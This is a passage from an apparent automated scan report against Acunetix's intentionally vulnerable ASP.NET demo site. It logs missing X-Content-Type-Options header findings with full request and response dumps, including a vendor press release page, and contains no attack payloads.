style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 30606
